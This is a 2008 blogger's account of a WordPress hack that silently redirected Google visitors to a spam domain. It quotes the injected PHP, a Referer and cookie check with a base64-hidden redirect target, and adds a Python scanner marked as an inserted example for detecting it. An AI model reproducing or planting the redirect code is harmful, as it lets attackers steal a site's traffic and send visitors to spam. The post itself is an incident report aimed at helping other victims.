WordPress Hacked, Search Engine Traffic Stolen by AnyResults.net

by Michael on June 5, 2008 · 5 comments

Something scary happened today at one of my other sites. Around 3:30 EDT, I noticed that I was getting many fewer visitors than normal. Upon further investigation, I realized that my search engine traffic had all but dried up. Thinking I had been banned by Google, I dug deeper.


Oddly enough, I still ranked well for all of the terms that had brought me traffic in the past. So what was happening? If I was still ranking well in the SERPs, why weren’t people clicking through?

Unsure of what else to do, I enlisted the help of some friends. Among other things, I asked these guys to search for a few keywords to see if my rankings were holding up. As it turns out, my search results were just fine, ruling out the possibility that Google had rolled out new search data that simply hadn’t filtered down to our neck of the woods.

And then it happened…

One of my friends clicked on a Google search result and was redirected elsewhere. But when he clicked it again, all was well. When I reported this to another friend, he saw something similar.

As it turns out, I was the victim of a WordPress hack that stole pretty much all of my search traffic, but somehow hid itself using cookies. Upon further inspection, I discovered the following bit of code at the top of index.php:

$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser="1"; break; }
if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }?>

If you hit Google without the cookie and tried to click through to my site, you were directed elsewhere. But once it happened to you once, it couldn’t be repeated until you cleared your cookies. Very sneaky.

So where was all of my traffic going?

It was being shunted through www.anyresults.net (no link for you!) and then winding up at a spammy, ad-filled landing page on www.dealtime.com (again, no link for you; I’ve helped enough today). I suspect that dealtime.com had likewise been compromised, though I can’t say for sure.

I’m still not sure how they got in, but I’ve reported it to my host, cleaned everything up, and changed all of my passwords. For reference, I was running WordPress 2.3.3, though I have since upgraded to WordPress 2.5.1.

Before you ask, yes, I’m aware that I was taking a slight risk by running a slightly older version of WordPress. In my defense, however, early releases of major WordPress updates often have numerous bugs of their own. As such, I typically wait until at least X.X.2 before upgrading unless a serious hole is discovered in the version that I’m currently using.

Guess what? I just found one.
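
A small scanner for the injection pattern quoted above (an added example, not code from the original post): it flags PHP source that combines a Referer check with a Location redirect whose destination is hidden in a base64_decode() literal, and decodes that literal so the real destination is visible. The names inspect_php and scan_tree and the last line of the sample are assumptions made for illustration.

```python
import base64
import re
from pathlib import Path

# Sample input: the two injected lines quoted in the post, followed by one
# constructed line standing in for the rest of a stock index.php.
SAMPLE = r'''<?php $ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser="1"; break; }
if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }?>
<?php require('./wp-blog-header.php'); ?>
'''

B64_CALL = re.compile(r'base64_decode\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)')
SIGNALS = {
    "referer_check": re.compile(r"\$_SERVER\[\s*['\"]HTTP_REFERER['\"]\s*\]"),
    "cookie_gate": re.compile(r"\$_COOKIE"),
    "redirect": re.compile(r"header\(\s*[\"']Location:", re.I),
}

def inspect_php(source):
    """Report which signals one PHP source string contains and decode
    every base64 string literal passed to base64_decode()."""
    hits = sorted(name for name, rx in SIGNALS.items() if rx.search(source))
    decoded = []
    for blob in B64_CALL.findall(source):
        try:
            raw = base64.b64decode(blob, validate=True)
        except ValueError:  # not valid base64, ignore the literal
            continue
        decoded.append(raw.decode("utf-8", "replace"))
    # Suspicious: a redirect that depends on the Referer and hides its target.
    suspicious = {"referer_check", "redirect"} <= set(hits) and bool(decoded)
    return {"signals": hits, "decoded": decoded, "suspicious": suspicious}

def scan_tree(root):
    """Inspect every .php file under root, not only index.php, and
    return {path: finding} for the suspicious ones."""
    findings = {}
    for path in Path(root).rglob("*.php"):
        text = path.read_text(encoding="utf-8", errors="replace")
        result = inspect_php(text)
        if result["suspicious"]:
            findings[str(path)] = result
    return findings

if __name__ == "__main__":
    print(inspect_php(SAMPLE))
```

A match is a prompt to review the file by hand and compare it with a clean copy of the same WordPress release; a clean scan does not prove the install is untouched.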



Eden June 5, 2008 at 5:20 pm

That’s a drag. Thanks for sharing the details though. Certainly that would be difficult to diagnose, but having the string of code you posted to reference will make it easy to find for anyone else who has been hacked.


Pinyo June 6, 2008 at 9:01 am

I am sorry to hear about the incident. I am glad to see you recovered quickly.


Bob June 7, 2008 at 12:15 pm

Hello,

My blogs are suffering from the same hack.

How exactly did you clean it up?

Just remove the code from index.php?


John June 8, 2008 at 7:49 am

For what it’s worth, I was running 2.5.1 and also got hacked.

The only difference seems to be the code going to wp-blog-header.php instead of index.php.


Alycia August 26, 2014 at 10:54 am

Howdy! Would you mind if I share your blog with my twitter group? There’s a lot of people that I think would really enjoy your content. Please let me know. Thank you
